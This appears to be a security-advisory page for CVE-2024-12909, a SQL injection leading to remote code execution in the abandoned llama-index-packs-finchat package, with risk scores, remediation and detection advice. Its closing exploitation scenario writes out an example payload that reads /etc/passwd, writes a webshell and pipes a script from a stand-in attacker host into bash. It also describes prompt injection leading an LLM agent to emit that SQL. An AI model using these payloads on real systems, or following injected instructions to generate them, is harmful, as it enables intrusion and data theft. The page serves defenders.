CVE-2024-12909 — CRITICAL (CVSS 10.0) AI Security Vulnerability

CISO Take

A critical SQL injection flaw (CVSS 10.0) in the FinanceChatLlamaPack's `database_agent` allows any unauthenticated remote attacker to inject arbitrary SQL and escalate to full remote code execution via PostgreSQL's large object functionality — no credentials, no interaction required. With 227 downstream dependents, 12 prior CVEs in the same package, and an EPSS score placing this in the top 28% for exploitation likelihood, the blast radius across AI-driven financial analysis pipelines is significant. Critically, no patch will ever be released: the maintainers resolved this by abandoning the package to a `stale_packages` branch and removing it from documentation. Immediate action is removal of `llama-index-packs-finchat` from all environments; any deployment retaining this package is fully exposed to unauthenticated RCE against its PostgreSQL backend.

Sources: NVD EPSS GitHub Advisory CISA KEV ATLAS

Risk Assessment

Severity is maximum (CVSS 10.0) with the most dangerous attack profile possible: network-accessible, low complexity, no privileges required, no user interaction, full CIA impact with scope change. The lack of any patch and the package's abandonment mean this vulnerability will never be remediated upstream. While EPSS (0.694%) reflects relatively low current active exploitation, the trivial exploitability of SQL injection combined with the PostgreSQL large object RCE path — a well-documented technique (e.g., CVE-2019-9193 precedent) — means exploitation requires minimal attacker sophistication. Organizations running AI financial analysis agents backed by PostgreSQL face the highest exposure.

Affected Systems

Package	Ecosystem	Vulnerable Range	Patched
llama-index-packs-finchat	pip	<= 0.3.0	No patch
48.3K 227 dependents Pushed 3d ago 87% patched ~50d to patch Full package profile →

Do you use llama-index-packs-finchat? You're affected.

Severity & Risk

CVSS 3.1

10.0 / 10

EPSS

0.7%

chance of exploitation in 30 days

Higher than 72% of all CVEs

Source: EPSS v3 — FIRST.org

Exploitation Status

No known exploitation

Sophistication

Trivial

Recommended Action

**Remove immediately**: Uninstall `llama-index-packs-finchat` — no patch exists and none will be issued. Pin your `llama-index` packs to avoid automatic reinstallation. 2. **Audit dependent packages**: Run `pip show llama-index-packs-finchat` and audit `requirements.txt`/`pyproject.toml` across all AI services. 3. **PostgreSQL hardening**: Restrict the database user used by any LLM agent to SELECT-only with no SUPERUSER, no CREATEDB, and no `pg_execute_server_program` privilege. Disable `COPY TO PROGRAM` for application roles. 4. **Detection**: Monitor PostgreSQL logs for `lo_create`, `lo_import`, `lo_export`, `COPY TO PROGRAM`, and `pg_largeobject` table access patterns from application service accounts. 5. **Replacement**: Implement any required financial DB query functionality using a parameterized query wrapper with strict input validation before exposing to LLM-generated SQL.

Classification

Code Execution Supply Chain Data Extraction Agent Framework Plugin AML.T0010.001 - AI Software AML.T0010.005 - AI Agent Tool AML.T0049 - Exploit Public-Facing Application AML.T0050 - Command and Scripting Interpreter AML.T0053 - AI Agent Tool Invocation

Compliance Impact

This CVE is relevant to:

EU AI Act

Article 15 - Accuracy, robustness and cybersecurity

ISO 42001

A.6.2.6 - AI system security

NIST AI RMF

MS-2.5 - AI Risk Measurement and Monitoring

OWASP LLM Top 10

LLM07:2025 - Insecure Plugin Design

Technical Details

NVD Description

A vulnerability in the FinanceChatLlamaPack of the llama-index-packs-finchat package, versions up to v0.3.0, allows for SQL injection in the `run_sql_query` function of the `database_agent`. This vulnerability can be exploited by an attacker to inject arbitrary SQL queries, leading to remote code execution (RCE) through the use of PostgreSQL's large object functionality. The issue is resolved by no longer officially supporting the package and moving it into the `stale_packages` branch on the repo, this removing it from documentation etc.

Exploitation Scenario

An attacker targeting an AI financial analysis application built on LlamaIndex sends a crafted natural-language query (or, in an agentic pipeline, injects a malicious instruction via prompt injection). The LLM generates and passes a SQL string containing a PostgreSQL large object payload to `run_sql_query`. Example payload: `'; SELECT lo_import('/etc/passwd'); SELECT lo_export(16384, '/var/www/html/shell.php'); --`. If the PostgreSQL user has sufficient privileges, this writes a webshell to the server filesystem. Alternatively, if the role has `SUPERUSER`, the attacker uses `COPY (SELECT 'payload') TO PROGRAM 'curl attacker.com/shell.sh | bash'` to achieve direct OS command execution. The entire attack chain is unauthenticated and requires no prior knowledge of the schema.